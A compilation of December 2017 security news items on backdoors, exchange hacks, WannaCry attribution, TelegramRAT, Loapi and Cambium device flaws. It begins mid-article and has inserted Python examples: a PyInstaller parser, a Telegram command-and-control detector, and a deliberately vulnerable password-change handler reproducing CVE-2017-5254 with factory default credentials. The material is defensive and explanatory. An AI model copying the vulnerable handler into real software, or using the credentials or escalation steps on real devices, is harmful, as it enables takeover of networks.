All communication with the server is encrypted, with the ciphering algorithm depending on the type of transmitted object. The bot can send technical messages, which contain information about the OS or about the performed commands, and operational messages, which contain lists of files in a directory or the content of a specific file.

Based on commands received from the C&C, the malware can scan the file system, execute a specified batch file or application with passed arguments, check whether a specified file exists, delete/rename/move/create files, download and execute files (scripts or BAT files), download DLLs and launch them using the LoadLibrary API function, and load/unload a library to/from memory.

According to Kaspersky, the actor behind the Travle backdoor has been active during the last few years but doesn’t appear worried about being tracked by security companies. In fact, all of the modifications and new additions they made to their tools have been discovered and detected quite quickly.

“Still, the fact that they didn’t really need to change their TTPs during all these years seems to suggest that they don’t need to increase their sophistication level in order to fulfill their goals. What’s worse, according to subjects of decoy documents these backdoors are used primarily in the CIS region against government organizations, military entities and companies engaged in high-tech research, which indicates that even high-profile targets still have a long way to go to implement IT-sec best practices which efficiently resist targeted attacks,” Kaspersky concludes.


South Korea cryptocurrency exchange Youbit shuts down after second hack in 2017
19.12.2017 securityaffairs Hacking

The South Korean cryptocurrency exchange Youbit has gone bankrupt after suffering a major cyber attack for the second time this year.
The company announced on Tuesday that it is filing for bankruptcy after being hacked for the second time in eight months; it said it lost 17 percent of its assets in the latest attack.

This is the first time a cryptocurrency exchange based in South Korea has gone bankrupt.

Eight months ago hackers stole nearly 4,000 bitcoin (5.5 billion won, or $5 million, at the time of the hack), which accounted for nearly 40 percent of the Youbit exchange’s total assets, in an attack blamed on North Korea.

“We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy,” reads the statement issued by the company after the last attack.

To limit the impact on customers, all clients will have their cryptocurrency assets marked down by 25 percent; Youbit says it will cover the remaining losses by selling the company's remaining assets and using insurance.

The South Korean market for virtual currencies has become one of the most active in the world: its trades account for some 20 percent of global Bitcoin transactions, and more than one million South Koreans already hold Bitcoin.

Analysts note that demand is so high that prices for the unit are around 20 percent higher than in the US.

As global bitcoin prices continue to rise, threat actors are increasingly targeting virtual currencies and the businesses that handle them.

Recently security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.


U.S. blames North Korea for the massive WannaCry ransomware attack
19.12.2017 securityaffairs Ransomware

It’s official, according to Tom Bossert, homeland security adviser, the US Government attributes the massive ransomware attack Wannacry to North Korea.
It’s official: the US Government attributes the massive WannaCry attack to North Korea.

The attribution was first reported by The Wall Street Journal; according to the US Government, the WannaCry attack that infected hundreds of thousands of computers worldwide in May was an act of information warfare.

WannaCry infected some 200,000 computers across 150 countries in a matter of hours in May. It spread using “EternalBlue”, an exploit originally developed by the NSA for a vulnerability in the SMBv1 implementation of older Windows versions, which Microsoft had patched as MS17-010 in March 2017. The exploit was stolen by a group calling itself “Shadow Brokers”, which leaked it to the world in April 2017.

The ransomware infected systems in any industry and also targeted critical infrastructures such as hospitals and banks.

[Image: WannaCry ransomware on a Bayer radiology system (source: Forbes)]

In October, the UK Government linked the WannaCry attack that crippled NHS to North Korea.

“This attack, we believe quite strongly that it came from a foreign state,” Ben Wallace, a junior minister for security, told BBC Radio 4’s Today programme.

“North Korea was the state that we believe was involved in this worldwide attack,” he said, adding that the government was “as sure as possible”.

The attack caused billions of dollars in damage. Now United States Homeland Security Advisor Tom Bossert has officially blamed North Korea, declaring that the US Government has collected evidence linking Pyongyang to the massive WannaCry attack.

“The attack was widespread and cost billions, and North Korea is directly responsible,” Tom Bossert, homeland security adviser to President Donald Trump, wrote in an article published by the Wall Street Journal.

“North Korea has acted especially badly, largely unchecked, for more than a decade, and its malicious behavior is growing more egregious,” he added. “WannaCry was indiscriminately reckless.”

The US government was expected to follow up with an official statement blaming North Korea for the attack.

The US Government says it has evidence linking the North Korean APT known as the Lazarus Group to WannaCry, and assesses with a “very high level of confidence” that the group carried out the attack.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who have investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it has been involved in both cyber espionage campaigns and sabotage operations aimed at destroying data and disrupting systems. Security researchers concluded that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh central bank cyber heist.

According to security experts, the group was also behind other large-scale campaigns against targets worldwide, including Operation Troy, Operation DarkSeoul and the Sony Pictures hack.

The North Korean government has not yet commented on the allegation.


New TelegramRAT Exploits Recently Patched Office Vulnerability
19.12.2017 securityweek Vulnerability
A recently discovered Remote Access Trojan (RAT) is being distributed via documents that exploit a 17-year-old Office vulnerability patched in November 2017, Netskope warns.

Dubbed TelegramRAT, the malware leverages the Telegram Messenger application for command and control (C&C), and abuses a cloud storage platform to store its payload. This approach allows the threat to evade some traditional security scanners.

Attacks involving TelegramRAT start with a malicious Office document exploiting CVE-2017-11882, a memory corruption vulnerability in the Microsoft Equation Editor (EQNEDT32.EXE), a component that dates back to November 2000. The bug went unnoticed for 17 years until Microsoft patched it last month by modifying the binary directly, and it didn’t take long for malicious actors to start abusing it.

As part of the newly observed attack, the Bit.ly URL redirection service is used to conceal the TelegramRAT payload hosted on Dropbox. The malware uses the Telegram BOT API to receive commands and send responses to the attacker. By employing SSL cloud applications for infection and C&C operations, the malware can keep communication hidden from security applications.

“The payload executable strings contained lots of references to Python files. After a quick analysis, the payload looked to be a Python program converted into a standalone binary executable that contained everything needed to run the application,” Netskope says.

Because the Python interpreter, the application code, and all the required libraries are packaged, the executable is large in size, which also makes it less suspicious.

Within the extracted directory, the researchers found PYD files, DLL files, and an out00-PYZ.pyz_extracted folder containing .pyc files. They also found a file called “RATAttack”, which points to the open-source “RAT-via-Telegram” project on GitHub.

The attackers used almost the exact code from GitHub when compiling their Python executable, the security researchers have discovered.
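The out00-PYZ.pyz_extracted folder the researchers mention is what a PyInstaller extractor produces, and the first step in reaching it is recognising the PyInstaller bundle and reading the cookie it leaves at the end of the embedded archive. The script below is an added example, not from Netskope's analysis; the cookie layout (magic, package length, TOC offset, TOC length, Python version, Python library name) is PyInstaller's own for version 2.1 and later, and the sample binary it builds is constructed so the code runs offline.

```python
"""Recognise a PyInstaller-built executable and parse its trailing cookie
(added example; the sample bundle is constructed, not a real payload)."""
import struct

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"   # PyInstaller CArchive cookie magic
COOKIE_FMT = "!8siiii64s"                   # big-endian: magic, pkglen, toc, toclen, pyver, libname
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes


def decode_pyver(pyver):
    """PyInstaller < 4 stores 36 for Python 3.6; newer releases store 310 for 3.10."""
    if pyver >= 100:
        return f"{pyver // 100}.{pyver % 100}"
    return f"{pyver // 10}.{pyver % 10}"


def find_pyinstaller_cookie(data):
    """Return the parsed cookie if `data` looks like a PyInstaller bundle, else None."""
    pos = data.rfind(PYINST_MAGIC)          # the cookie sits at the end of the archive
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    magic, pkg_len, toc_off, toc_len, pyver, libname = struct.unpack(
        COOKIE_FMT, data[pos:pos + COOKIE_SIZE])
    archive_start = pos + COOKIE_SIZE - pkg_len   # package length includes the cookie
    if archive_start < 0:
        return None
    return {
        "cookie_offset": pos,
        "archive_start": archive_start,
        "toc_offset": archive_start + toc_off,    # absolute file offset of the TOC
        "toc_length": toc_len,
        "python_version": decode_pyver(pyver),
        "python_library": libname.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_sample():
    """Constructed stand-in for a PyInstaller one-file binary (not a real sample)."""
    bootloader = b"MZ" + b"\x00" * 62            # 64-byte placeholder for the PE bootloader
    body = b"PYZ-00.pyz" + b"\x00" * 486         # 496-byte placeholder for the archive entries
    toc_off, toc_len = 400, 96                    # TOC occupies the last 96 bytes of the body
    pkg_len = toc_off + toc_len + COOKIE_SIZE     # how PyInstaller computes the package length
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, toc_off, toc_len, 36, b"python36.dll")
    return bootloader + body + cookie


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    info = find_pyinstaller_cookie(data)
    print("not a PyInstaller bundle" if info is None else info)
```

The Python version recorded in the cookie tells you which interpreter to use when decompiling the recovered .pyc files, which is why it is worth reading before running an extractor.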

By using Telegram, which supports encrypted communication, the attackers ensure that they can easily communicate with the target without anyone snooping into the communication. The RAT’s authors create a Telegram bot and embed the bot’s Telegram token into the TelegramRAT’s configuration file. The malware then connects to the bot’s Telegram channel, where the attacker can issue commands for the infected machines.

Based on the received commands, the malware can take screenshots, execute shell commands, copy files, delete files/folders, download file from target, encode local files and decode them, enable/disable keyboard freeze, get Google Chrome’s login/passwords, record microphone, get keylogs, get PC information, open a proxy server, reboot/shut down the machine, run a file, schedule a command to run at specific time, display services and processes running, and update executable.

“TelegramRAT offers another unfortunate instance of attackers recognizing that the cloud can be leveraged to evade many traditional security scanners. By making itself cloud native, TelegramRAT uses one cloud application for its payload host, and another for its C&C operation. This cloud application splicing offers resilience to the attack, and requires security scanners to be able to discern cloud application instances, and to inspect SSL traffic to be effective,” Netskope concludes.
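Netskope's point about inspecting SSL traffic translates into two detections: a non-browser process polling the Telegram Bot API, and an executable pulled from cloud storage moments after a URL-shortener redirect. The detector below is an added example, not from Netskope's report, written over endpoint network events; the log format (ISO timestamp, host, process, destination host, URL path, comma separated), the SAMPLE_LOG lines, the bot tokens in them and the ALLOWED_BOT_PROCESSES list are all constructed for the example.

```python
"""Flag TelegramRAT-style cloud C2 and delivery in endpoint network events
(added example; the log lines and tokens are constructed)."""
import re
from datetime import datetime, timedelta

# /bot<id>:<secret>/<method>; the secret is never written into a finding.
BOT_API_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)")
SHORTENERS = {"bit.ly", "bitly.com"}
CLOUD_STORAGE = {"dropbox.com", "www.dropbox.com", "dl.dropboxusercontent.com"}
ALLOWED_BOT_PROCESSES = {"ops-alerts-bot.exe"}   # assumption: known in-house automation


def parse_event(line):
    ts, host, proc, dst, path = line.strip().split(",", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "proc": proc, "dst": dst, "path": path}


def detect(lines, window=timedelta(minutes=5)):
    """Return (host, rule, detail) findings in the order they are triggered."""
    findings = []
    reported_bots = set()
    last_shortener = {}     # host -> time of the most recent URL-shortener hit
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["dst"] == "api.telegram.org":
            m = BOT_API_RE.match(ev["path"])
            if m and ev["proc"] not in ALLOWED_BOT_PROCESSES:
                key = (ev["host"], ev["proc"], m.group(1))
                if key not in reported_bots:      # one finding per host/process/bot
                    reported_bots.add(key)
                    findings.append((ev["host"], "telegram_bot_c2",
                                     f"{ev['proc']} uses Telegram bot {m.group(1)} ({m.group(3)})"))
        elif ev["dst"] in SHORTENERS:
            last_shortener[ev["host"]] = ev["ts"]
        elif ev["dst"] in CLOUD_STORAGE and ev["path"].lower().endswith(".exe"):
            seen = last_shortener.get(ev["host"])
            if seen is not None and ev["ts"] - seen <= window:
                gap = int((ev["ts"] - seen).total_seconds())
                findings.append((ev["host"], "shortener_to_cloud_exe",
                                 f"{ev['dst']}{ev['path']} fetched {gap}s after a shortener redirect"))
    return findings


_FAKE_TOKEN = "123456789:" + "AAE" + "a" * 32        # constructed, not a real bot token
_ALLOWED_TOKEN = "987654321:" + "b" * 35             # constructed, not a real bot token

# Constructed sample events: WS-17 opens the malicious document, EQNEDT32.EXE
# (the Equation Editor process CVE-2017-11882 runs in) follows the bit.ly
# redirect to Dropbox, and the dropped binary starts polling the Bot API.
SAMPLE_LOG = f"""
2017-12-18T09:14:02,WS-17,EQNEDT32.EXE,bit.ly,/2xyzABC
2017-12-18T09:14:03,WS-17,EQNEDT32.EXE,dl.dropboxusercontent.com,/s/abc123/update.exe
2017-12-18T09:14:20,WS-17,update.exe,api.telegram.org,/bot{_FAKE_TOKEN}/getUpdates
2017-12-18T09:14:25,WS-17,update.exe,api.telegram.org,/bot{_FAKE_TOKEN}/getUpdates
2017-12-18T09:15:00,WS-03,chrome.exe,www.dropbox.com,/home
2017-12-18T09:16:00,WS-03,ops-alerts-bot.exe,api.telegram.org,/bot{_ALLOWED_TOKEN}/sendMessage
"""

if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{host}: {rule}: {detail}")
```

Without TLS inspection only the destination hosts survive, and api.telegram.org or dl.dropboxusercontent.com alone are too common to alert on; the process name and the URL path are what make these rules precise.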


Australia Police Accidentally Broadcast Arrest Plans on Social Media
19.12.2017 securityweek BigBrothers
Australian police accidentally broadcast on social media details of an operation to arrest a suspected North Korean agent -- three days before he was taken into custody, media reported Wednesday.

The Sydney-based man, described by authorities as a "loyal agent of North Korea", was arrested on Saturday and charged with trying to sell missile parts and technology on the black market to raise money for Pyongyang in breach of international sanctions.

But a minute of conversation about the case between federal police officers, including the timing of the arrest, was broadcast on Periscope Wednesday and linked to on Twitter, The West Australian reported Tuesday.

The newspaper said it had listened to the discussion, which included a suggestion that officers are "not going in all guns blazing, it's only half-a-dozen people and a forensic van".

The paper added that while the tweet was deleted, the broadcast remained live -- and was watched by 40 people -- before it was also removed after the publication alerted federal police.

It was only by luck that no details of the identity of the target were revealed, the West Australian added.

Federal police confirmed part of a conversation was mistakenly broadcast via its Periscope account while "testing a piece of social media broadcasting equipment".

"Steps have been taken to ensure such incidents will not occur again," the force said in a statement.

"The matter has been referred to the AFP's security area for review."

AFP [Australian Federal Police] Assistant Commissioner Neil Gaughan told reporters on Sunday that the case involving the alleged agent was "like nothing we have ever seen on Australian soil".

He added that the 59-year-old suspect, named in local media as Chan Han Choi, was a "loyal agent of North Korea, believing he was acting to serve some higher patriotic purpose".

Choi, who is in custody, is due back in court this week.


South Korea Cryptocurrency Exchange Shuts Down After Hacking
19.12.2017 securityweek Hacking
A South Korean exchange trading bitcoin and other virtual currencies declared itself bankrupt on Tuesday after being hacked for the second time this year, highlighting the risk over cryptocurrencies as they soar in popularity.

The Youbit exchange said it had lost 17 percent of its assets in the attack on Tuesday.

It came eight months after nearly 4,000 bitcoin -- then valued at 5.5 billion won ($5 million) and nearly 40 percent of the exchange's total assets -- were stolen in a cyber attack blamed on North Korea.

"We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy," the exchange said in a statement which did not assign blame for the latest attack.

All its customers will have their cryptocurrency assets marked down by 25 percent, it said, adding it would do its best to "minimise" their losses by using insurance and selling the remains of the firm.

The exchange -- founded in 2013 -- brokered trades of multiple virtual currencies including bitcoin and ethereum.

It is the first time that a South Korean cryptocurrency exchange has gone bankrupt.

Investing in virtual currencies has become hugely popular in the hyper-wired South, whose trades account for some 20 percent of global bitcoin transactions.

About one million South Koreans, many of them small-time investors, are estimated to own bitcoin. Demand is so high that prices for the unit are around 20 percent higher than in the US, its biggest market.

Global bitcoin prices have soared around 20-fold this year.

Concerns over a potential bubble have unnerved Seoul's financial regulators, who last week banned its financial institutions from dealing in virtual currencies.


U.S. Declares North Korea Led Huge WannaCry Cyberattack
19.12.2017 securityweek BigBrothers
The United States officially accused North Korea late Monday of carrying out the massive WannaCry attack that infected some 300,000 computers in 150 countries earlier this year.

North Korea was widely suspected of being behind the computer virus and ransomware, which demanded payment to restore access. It has been denounced as such by Britain, but the United States had yet to follow suit.

Homeland Security Advisor Tom Bossert made the announcement in a Wall Street Journal op-ed, and was expected to provide more details in a briefing with reporters early Tuesday.

"The attack was widespread and cost billions, and North Korea is directly responsible," he wrote.

"We do not make this allegation lightly. It is based on evidence."

Among the infected computers were those at Britain's National Health Service (NHS), Spanish telecoms company Telefonica and US logistics company FedEx.

"These disruptions put lives at risk," Bossert wrote.

"North Korea has acted especially badly, largely unchecked, for more than a decade, and its malicious behavior is growing more egregious. WannaCry was indiscriminately reckless."

He said Washington must lead efforts to cooperate with other governments and businesses to "mitigate cyber risk and increase the cost to hackers," and thus improve internet security and resilience.

"When we must, the US will act alone to impose costs and consequences for cyber malfeasance," Bossert added.

President Donald Trump "has already pulled many levers of pressure to address North Korea's unacceptable nuclear and missile developments, and we will continue to use our maximum pressure strategy to curb Pyongyang's ability to mount attacks, cyber or otherwise."

The WannaCry attack spread rapidly around the globe by exploiting a flaw in the SMBv1 file-sharing implementation of Microsoft Windows. Microsoft had patched the flaw (MS17-010) two months earlier, but unpatched machines, and older versions such as Windows XP that no longer received mainstream support at the time, remained exposed.

Ransomware, which can be used on PCs as well as tablets and smartphones, is malicious software which locks computer files and forces users to pay the attackers a designated sum in the virtual Bitcoin currency to regain access to the files.

The Washington Post cited a US official as saying Trump's administration would be urging allies to counter North Korea's cyberattack capabilities and implement all "relevant" UN Security Council sanctions.

It said the CIA had already laid blame on North Korea for the attack in November, though the assessment was classified and had not yet been previously reported.


Cambium Wireless Networking Devices Vulnerable to Attacks
19.12.2017 securityweek Vulnerability
A researcher has discovered nearly a dozen security issues in ePMP and cnPilot wireless networking products from Cambium, including vulnerabilities that can be exploited to take control of devices and the networks they serve.

Cambium’s ePMP and cnPilot wireless broadband solutions are used by managed services providers, governments, retailers, ISPs, hotels, schools, enterprises, and industrial organizations.

Researcher Karn Ganeshen discovered that ePMP 1000, 2000 and Force wireless broadband devices, and cnPilot R190, R200 and R201 Wi-Fi access points are affected by potentially serious vulnerabilities. The flaws were reported to Cambium in September via Rapid7 and a majority of them were patched last month.

While exploiting the flaws normally requires access to the network, Rapid7’s Project Sonar found more than 36,000 ePMP devices and 133 cnPilot systems reachable from the Internet, many of which could be vulnerable. The highest numbers of exposed systems were seen in Serbia (9,600), the United States (8,200), Italy (5,000), Brazil (3,000), Spain (2,700), Colombia (2,500) and South Africa (1,100).

Several of the vulnerabilities have been rated critical with a CVSS score of 9.0. One of them is CVE-2017-5254, a privilege escalation flaw affecting ePMP devices. These systems are shipped with several default accounts with default credentials, including admin/admin, installer/installer, home/home and readonly/readonly. The home and installer accounts don’t have admin privileges, but Ganeshen discovered that they can be used to change the admin account password.

The admin password normally cannot be changed by an installer or home user because the password field is not editable in the web interface. However, the restriction is enforced only in the browser: an attacker logged in with one of these low-privileged accounts can use the browser’s Inspect Element feature to delete the disabled=”” attribute, which makes the field editable, and submit a new admin password. That password can then be used to access the web interface with administrator privileges.
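The ePMP escalation comes down to an authorisation decision made in the browser instead of on the device. The example below is added here and is not Cambium's code: a minimal password-change handler in its vulnerable form, which trusts whatever fields arrive because the form withheld the admin field from non-admins, beside a hardened form that checks the caller's role on the server. The account store, role names and form field names are assumptions; the four default accounts are the ones named above, and the plaintext passwords are a simplification for the example. A default-credential check is included because the flaw is only reachable through those accounts.

```python
"""Client-side 'disabled' is not an access control: vulnerable vs. hardened
password-change handler (added example, not Cambium's code)."""
import copy
import hmac

DEFAULT_ACCOUNTS = {                      # the four factory accounts named in the advisory
    "admin":     {"password": "admin",     "role": "admin"},
    "installer": {"password": "installer", "role": "installer"},
    "home":      {"password": "home",      "role": "home"},
    "readonly":  {"password": "readonly",  "role": "readonly"},
}


def login(users, username, password):
    user = users.get(username)
    if user is None or not hmac.compare_digest(user["password"], password):
        raise PermissionError("bad credentials")
    return {"user": username, "role": user["role"]}


def render_password_form(session):
    """What the browser receives: the only gate in the vulnerable design."""
    disabled = "" if session["role"] == "admin" else ' disabled=""'
    return (f'<input name="own_password">'
            f'<input name="admin_password"{disabled}>')


def change_password_vulnerable(users, session, form):
    """Trusts the UI to have withheld admin_password from non-admins."""
    if "own_password" in form:
        users[session["user"]]["password"] = form["own_password"]
    if "admin_password" in form:          # no role check: CVE-2017-5254 in miniature
        users["admin"]["password"] = form["admin_password"]


def change_password_hardened(users, session, form):
    """Authorise every target on the server, whatever the form looked like."""
    if "own_password" in form:
        users[session["user"]]["password"] = form["own_password"]
    if "admin_password" in form:
        if session["role"] != "admin":
            raise PermissionError(f"{session['user']} may not change the admin password")
        users["admin"]["password"] = form["admin_password"]


def default_credentials_in_use(users):
    """Accounts still carrying their factory password (password == username)."""
    return [name for name, rec in users.items()
            if hmac.compare_digest(rec["password"], name)]


def demo():
    """Replay the attack against both handlers; returns (vuln_admin_pw, hard_admin_pw, denied)."""
    # The attacker logs in with the low-privileged default 'home' account and
    # submits admin_password anyway, as if the disabled attribute were removed.
    attack = {"admin_password": "attacker-controlled"}

    vuln = copy.deepcopy(DEFAULT_ACCOUNTS)
    change_password_vulnerable(vuln, login(vuln, "home", "home"), attack)

    hard = copy.deepcopy(DEFAULT_ACCOUNTS)
    denied = False
    try:
        change_password_hardened(hard, login(hard, "home", "home"), attack)
    except PermissionError:
        denied = True
    return vuln["admin"]["password"], hard["admin"]["password"], denied


if __name__ == "__main__":
    print(render_password_form({"user": "home", "role": "home"}))
    print(demo())
    print("default credentials still set:", default_credentials_in_use(DEFAULT_ACCOUNTS))
```

The same rule covers the readonly account: every privileged action, not just the password field, needs its own server-side role check, since an attacker never has to use the vendor's form at all.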

Another critical privilege escalation flaw in ePMP is CVE-2017-5255. It allows an authenticated attacker – even one with a readonly account – to execute OS-level commands as root by sending a specially crafted request to a function named get_chart.

A hacker can also escalate privileges on an ePMP device by exploiting persistent cross-site scripting (XSS) vulnerabilities in the Device Name and System Description fields. An attacker with access to a device’s web interface can insert JavaScript code into these fields and the code will get executed both when the login page is accessed and after the user has logged in.

There are also a couple of other XSS flaws in the ePMP product, but these are more difficult to exploit. The XSS vulnerabilities can allow an attacker to hijack a user’s session, hook the browser, or conduct other activities that can lead to privilege escalation.

The most serious flaw affecting the cnPilot product is related to an undocumented root web shell that can be accessed by any user (CVE-2017-5259). Another critical issue in cnPilot allows privilege escalation via a direct object reference vulnerability (CVE-2017-5260).

cnPilot is also affected by information disclosure and privilege escalation flaws that have been rated medium severity.

The vulnerabilities affect ePMP products running version 3.5 and earlier of the firmware and cnPilot devices running version 4.3.2-R4 and earlier. Fixes have been introduced with the release of versions 3.5.1 and 4.4, respectively. Two issues involving the lack of cross-site request forgery (CSRF) protections and some suspicious binaries have not been patched.


This New Android Malware Can Physically Damage Your Phone
19.12.2017 thehackernews Android


Due to the recent surge in cryptocurrency prices, not only hackers but also legitimate website administrators are increasingly using JavaScript-based cryptocurrency miners to monetize their sites by using the CPU power of visitors' PCs to mine Monero or other cryptocurrencies.
Just last week, researchers from AdGuard discovered that some popular video streaming and ripping sites, including openload, Streamango, Rapidvideo and OnlineVideoConverter, hijack CPU cycles from their hundreds of millions of visitors to mine Monero.
Now, researchers from Moscow-based cyber security firm Kaspersky Lab have uncovered a new strain of Android malware lurking in fake anti-virus and porn applications, which is capable of performing a plethora of nefarious activities—from mining cryptocurrencies to launching Distributed Denial of Service (DDoS) attacks.
Dubbed Loapi, the new Android Trojan runs so many malicious activities at once that it can physically wear out a handset: within just two days of infection it caused a test phone's battery to bulge out of its cover.
Described as a "jack-of-all-trades" by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.
Loapi Destroyed An Android Phone In Just 2 Days

When analysing a Loapi sample, Kaspersky's researchers found that the malware mines Monero so intensely that it destroyed a test Android phone after two days, causing the battery to bulge and deforming the phone's cover.
According to the researchers, the cybercriminals behind Loapi are the same ones responsible for the 2015 Android malware Podec. They distribute the malware through third-party app stores and online advertisements posing as "popular antivirus solutions and even a famous porn site."
A screenshot in the Kaspersky blog suggests that Loapi impersonates at least 20 different adult-content apps and legitimate antivirus products, including those of AVG, PSafe DFNDR, Kaspersky Lab, Norton, Avira, Dr.Web and CM Security.
Upon installation, Loapi pressures the user into granting it 'device administrator' permissions by showing the request in a loop until the victim taps yes, which gives the malicious app the power to lock the screen and resist removal.
Such a high level of privilege would also make Loapi well suited to spying on the user; that capability is not present yet, but the Kaspersky researchers think it could be added in the future.
Loapi Malware Aggressively Fights to Protect Itself
The researchers also said the malware "aggressively fights any attempts to revoke device manager permissions" by locking the screen and closing the settings window on its own.
Each of Loapi's modules (advertisement, SMS, mining, web crawler and proxy) talks to its own command and control (C&C) server to carry out its function on the infected device.
From one of those C&C servers Loapi receives a list of legitimate antivirus apps that pose a danger to it; when one of them is installed or launched, the Trojan declares the real app malware and shows a pop-up urging the user to delete it, in a loop, until the user finally does.
"Loapi is an interesting representative from the world of malicious Android apps. Its creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device," the researchers concluded.
Fortunately, Loapi has not made its way into the Google Play Store, so users who stick to the official app store are not affected. Remain vigilant even when installing from Play, though, since malware does regularly make its way there.


Kaspersky Lab Sues U.S. Government Over Software Ban
19.12.2017 thehackernews BigBrothers

Moscow-based cyber security firm Kaspersky Lab has taken the United States government to a U.S. federal court for its decision to ban the use of Kaspersky products in federal agencies and departments.
In September 2017, the United States Department of Homeland Security (DHS) issued a Binding Operational Directive (BOD) ordering civilian government agencies to remove Kaspersky Lab software from their computers and networks within 90 days.
The order came amid mounting concern among United States officials that the Kaspersky antivirus software could be helping the Russian government spy on their activities, which may threaten U.S. national security.
U.S. President Donald Trump also signed into law last week legislation that bans the use of Kaspersky products within the U.S. government, capping a months-long effort to purge Kaspersky from federal agencies amid concerns it's vulnerable to Kremlin influence.
Kaspersky's appeal is part of an ongoing campaign by the company to refute allegations that it is vulnerable to Russian influence.
There is as yet no substantial public evidence proving these allegations, but an article published by the WSJ in October claimed that Kaspersky software helped Russian spies steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
Just last month, Kaspersky claimed that its antivirus package running on the staffer's PC detected the copies of the NSA exploits as malware and uploaded them to its cloud for analysis, but its analysts immediately deleted them.
Earlier this month, the NSA staffer, identified as Nghia Hoang Pho, a 67-year-old of Ellicott City, Maryland, pleaded guilty to illegally taking classified documents home, which were later stolen by Russian hackers.
Kaspersky Lab Challenges DHS's Ban on its Software in U.S. Court
Underlining that U.S. authorities have not provided any substantial evidence of wrongdoing by the company, CEO Eugene Kaspersky wrote in an open letter to the Homeland Security agency on Monday, stressing that the "DHS's decision is unconstitutional" and based purely on "subjective, non-technical public sources."
"One of the foundational principles enshrined in the U.S. Constitution, which I deeply respect, is due process: the opportunity to contest any evidence and defend oneself before the government takes adverse action," Kaspersky wrote.
"Unfortunately, in the case of Binding Operational Directive 17-01, DHS did not provide Kaspersky Lab with a meaningful opportunity to be heard before the Directive's issuance, and therefore, Kaspersky Lab's due process rights were infringed."
Kaspersky argues that the company was not given enough time to contest allegations before the DHS issued a ban, and that the documents available at the time of the ban were based more on references than a technical threat that the company could analyze and respond to.
The company also said that it wrote to DHS in mid-July to address any concerns the U.S. agency had, and DHS even acknowledged receipt of the communication in mid-August, appreciating the company's offer to provide information on the matter.
Kaspersky: DHS Harmed Kaspersky Lab's Reputation
However, Kaspersky said the agency did not follow up with the company "until the notification regarding the issuance of Binding Operational Directive 17-01", which accused Kaspersky products of posing information security risks to federal information systems.
"DHS has harmed Kaspersky Lab's reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community," Kaspersky wrote.
"In filing this appeal, Kaspersky Lab hopes to protect its due process rights under the US Constitution and federal law and repair the harm caused to its commercial operations, its US-based employees, and its US-based business partners."
CEO Eugene Kaspersky has repeatedly denied the company's ties to any government and said it would not help a government with cyber espionage, adding that "If the Russian government comes to me and asks me to do anything wrong, or my employees, I will move the business out of Russia."
In October, it was also reported that Israeli government hackers had broken into Kaspersky's network in 2015 and caught Russian hackers red-handed hacking the United States government with the help of Kaspersky software.
In the wake of this incident, Kaspersky Lab also launched a transparency initiative late October, giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.


The thin line between BlackEnergy, DragonFly and TeamSpy attacks
19.12.2017 securityaffairs APT

Experts from McAfee Labs collected evidence that links DragonFly malware to other hacking campaigns, like BlackEnergy and TeamSpy attacks.
On September 6, Symantec published a detailed analysis of the Dragonfly 2.0 campaign that targeted dozens of energy companies this year. The threat actor is the same one behind the Dragonfly campaign observed in 2014.

Further analysis conducted by McAfee Labs led the experts to believe that Operation Dragonfly is linked to earlier attacks.

The investigation conducted by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries.

The experts noticed that the techniques, tactics, and procedures (spear phishing, watering holes, and exploitation of supply-chain technologies) were the same as those used in previous campaigns.

“By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.” reads the analysis published by McAfee Labs.

Once they had compromised the target network, the attackers used Remote Desktop Protocol to hop among internal or external systems, connecting either to a control server or to a compromised internal server to conduct operations.

Researchers observed threat actors using several backdoors and utilities, in one case a Trojan used in 2017 attacks was also used in a July 2013 attack.

Experts correlated the malware by analyzing the samples' hashes: both contained the same TeamViewer component that was spotted by the Hungarian security company CrySyS in a report about the TeamSpy malware.

The TeamSpy hackers hit a wide variety of high-level targets, including the Russia-based embassy of an undisclosed country belonging to both NATO and the European Union, multiple research and educational organizations in France and Belgium, an electronics company located in Iran and an industrial manufacturer located in Russia.

CrySyS researchers mentioned the same hash used in the recent attacks and correlated it to a sample that was compiled on 2011:09:07 – 09:27:58+01:00.

“Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?” continues McAfee Labs.

The experts discovered that the 2017 sample contained code blocks associated with BlackEnergy malware.

[Figure: BlackEnergy sample from 2016 (left) alongside a Dragonfly sample from 2017. Source: McAfee]

“Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.” continues the analysis.

